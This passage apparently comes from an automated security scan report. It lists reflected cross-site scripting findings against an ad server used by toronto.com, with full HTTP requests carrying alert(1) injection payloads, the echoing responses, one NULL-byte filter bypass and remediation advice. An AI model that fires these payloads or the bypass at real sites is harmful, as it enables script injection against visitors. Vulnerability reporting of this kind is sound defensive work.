User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1612

document.write("\n");
var curDateTime = new Date();
var offset = -(curDateTime.getTimezoneOffset());
if (offset > 0)
offset = "+" + offset;
if (window.adgroupid == undefined) {
window.adgroupid = Math
...[SNIP]...
dserver.adtechus.com/adlink/5214/965516/0/2666/AdId=1084099;BnId=1;itime=224506911;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&%003a728"-alert(1)-"666952faf27=1http://adserver.adtechus.com/adlink/3.0/5294.1/1352306/0/2666/ADTECH;loc=300;key=key1+key2+key3+key4;rdclick=http://adserver.adtechus.com/adlink/5214/965516/0/2666/AdId=1084099;BnId=1;itime=224506911
...[SNIP]...

2.107. http://adserver.adtechus.com/addyn/3.0/5214.1/965547/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965547/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e102c"-alert(1)-"56d9eef452d was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965547/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_300x50_1;size=300x50;key=;grp=353;misc=1290373582825;aduho=-360;rdclick=e102c"-alert(1)-"56d9eef452d HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1905

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/965547/0/711/AdId=458978;BnId=1;itime=384581719;nodecode=yes;link=e102c"-alert(1)-"56d9eef452dhttp://www.toronto.com\" target=\"_blank\">
...[SNIP]...

2.108. http://adserver.adtechus.com/addyn/3.0/5214.1/965547/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965547/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb7f5"-alert(1)-"666ab63a259 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965547/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_300x50_1;size=300x50;key=;grp=353;misc=1290373582825;aduho=-360;rdclick=&eb7f5"-alert(1)-"666ab63a259=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1908

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/965547/0/711/AdId=458978;BnId=1;itime=384583783;nodecode=yes;link=&eb7f5"-alert(1)-"666ab63a259=1http://www.toronto.com\" target=\"_blank\">
...[SNIP]...

2.109. http://adserver.adtechus.com/addyn/3.0/5214.1/965555/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965555/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2c09"-alert(1)-"f1e8ed5056c was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965555/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_728x90_1;size=728x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=576;misc=1290207895190;aduho=-360;rdclick=d2c09"-alert(1)-"f1e8ed5056c HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Type: application/x-javascript
Content-Length: 563

document.write("\n");
document.write("<SCR"+"IPT TYPE=\"text/javascript\" SRC=\"http://ads.olivebrandresponse.com/st?ad_type=ad&ad_size=728x90&section=786976&pub_redirect_unencoded=1&pub_redirect=http
...[SNIP]...
rver.adtechus.com/adlink/5214/965555/0/225/AdId=607818;BnId=3;itime=210248828;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=d2c09"-alert(1)-"f1e8ed5056c\">
...[SNIP]...

2.110. http://adserver.adtechus.com/addyn/3.0/5214.1/965555/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965555/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db767"-alert(1)-"d499c938fdb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965555/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_728x90_1;size=728x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=576;misc=1290207895190;aduho=-360;rdclick=&db767"-alert(1)-"d499c938fdb=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Type: application/x-javascript
Content-Length: 568

document.write("\n");
document.write("<SCR"+"IPT TYPE=\"text/javascript\" SRC=\"http://ads.olivebrandresponse.com/st?ad_type=ad&ad_size=728x90&section=1280301&pub_redirect_unencoded=1&pub_redirect=htt
...[SNIP]...
er.adtechus.com/adlink/5214/965555/0/225/AdId=1014032;BnId=3;itime=210249252;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&db767"-alert(1)-"d499c938fdb=1\">
...[SNIP]...

2.111. http://adserver.adtechus.com/addyn/3.0/5214.1/965578/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965578/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3672b"-alert(1)-"d43ce14780a was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965578/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_1;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=346;misc=1290207916422;aduho=-360;rdclick=3672b"-alert(1)-"d43ce14780a HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2018

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
server.adtechus.com/adlink/5214/965578/0/5/AdId=861193;BnId=1;itime=210258001;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=3672b"-alert(1)-"d43ce14780ahttp://www.vecchiofrak.com\" target=\"_blank\">
...[SNIP]...

2.112. http://adserver.adtechus.com/addyn/3.0/5214.1/965578/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965578/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00f5b3b"-alert(1)-"528d178bff0 was submitted in the loc parameter. This input was echoed as f5b3b"-alert(1)-"528d178bff0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5214.1/965578/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_1;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=576;misc=1290207898200;aduho=-360;rdclick=%00f5b3b"-alert(1)-"528d178bff0 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 3064

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ver.adtechus.com/adlink/5214/965578/0/5/AdId=664088;BnId=1;itime=210259457;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=%00f5b3b"-alert(1)-"528d178bff0http://www.toronto.com/restaurants/listing/000-213-013\" target=\"_blank\" style=\"font-family: Arial, Helvetica, sans-serif;font-size:12px;font-weight: bold; color: #000000\">
...[SNIP]...

2.113. http://adserver.adtechus.com/addyn/3.0/5214.1/965578/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965578/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30c65"-alert(1)-"70b6690cc67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965578/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_1;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207886922;aduho=-360;rdclick=&30c65"-alert(1)-"70b6690cc67=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 3039

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ttp://adserver.adtechus.com/adlink/5214/965578/0/5/AdId=932197;BnId=1;itime=210264342;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&30c65"-alert(1)-"70b6690cc67=1http://www.bonaviabakery.com\" target=\"_blank\" style=\"font-family: Arial, Helvetica, sans-serif;font-size:12px;font-weight: bold; color: #000000\">
...[SNIP]...

2.114. http://adserver.adtechus.com/addyn/3.0/5214.1/965594/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965594/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 109bc"-alert(1)-"3bf1274285 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965594/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_160x600_1;size=160x600;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207887381;aduho=-360;rdclick=109bc"-alert(1)-"3bf1274285 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 496

document.write("\n");
document.write("<SCR"+"IPT TYPE=\"text/javascript\" SRC=\"http://ads.olivebrandresponse.com/st?ad_type=ad&ad_size=160x600&section=786976&pub_redirect_unencoded=1&pub_redirect=http://adserver.adtechus.com/adlink/5214/965594/0/154/AdId=607818;BnId=1;itime=210259934;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=109bc"-alert(1)-"3bf1274285\">
...[SNIP]...

2.115. http://adserver.adtechus.com/addyn/3.0/5214.1/965594/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965594/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ca8c"-alert(1)-"a365a4bf0ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965594/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_160x600_1;size=160x600;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207887381;aduho=-360;rdclick=&9ca8c"-alert(1)-"a365a4bf0ce=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 500

document.write("\n");
document.write("<SCR"+"IPT TYPE=\"text/javascript\" SRC=\"http://ads.olivebrandresponse.com/st?ad_type=ad&ad_size=160x600&section=786976&pub_redirect_unencoded=1&pub_redirect=http://adserver.adtechus.com/adlink/5214/965594/0/154/AdId=607818;BnId=1;itime=210263701;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&9ca8c"-alert(1)-"a365a4bf0ce=1\">
...[SNIP]...

2.116. http://adserver.adtechus.com/addyn/3.0/5214.1/965607/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965607/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49258"-alert(1)-"1e48cde024f was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965607/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_728x90_1;size=728x90;key=;grp=353;misc=1290373578067;aduho=-360;rdclick=49258"-alert(1)-"1e48cde024f HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Type: application/x-javascript
Content-Length: 2028

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/965607/0/225/AdId=1115194;BnId=1;itime=384526888;nodecode=yes;link=49258"-alert(1)-"1e48cde024fhttp://www.seetorontonow.com/camp/couples/index.html?ucid=M2010-001706\" target=\"_blank\">
...[SNIP]...

2.117. http://adserver.adtechus.com/addyn/3.0/5214.1/965607/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965607/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fbfe"-alert(1)-"542e65d3e6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965607/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_728x90_1;size=728x90;key=;grp=353;misc=1290373578067;aduho=-360;rdclick=&9fbfe"-alert(1)-"542e65d3e6b=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Type: application/x-javascript
Content-Length: 2039

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/965607/0/225/AdId=1115194;BnId=2;itime=384529653;nodecode=yes;link=&9fbfe"-alert(1)-"542e65d3e6b=1http://www.seetorontonow.com/camp/girlfriends/index.html?ucid=M2010-001703\" target=\"_blank\">
...[SNIP]...

2.118. http://adserver.adtechus.com/addyn/3.0/5214.1/965613/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965613/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28529"-alert(1)-"f738aaf4b11 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965613/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_237x90_1;size=237x90;key=;grp=353;misc=1290373577265;aduho=-360;rdclick=28529"-alert(1)-"f738aaf4b11 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18989

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
LICKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlink/5214/965613/0/2666/AdId=1178068;BnId=1;itime=384522683;nodecode=yes;link=28529"-alert(1)-"f738aaf4b11") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlin
...[SNIP]...

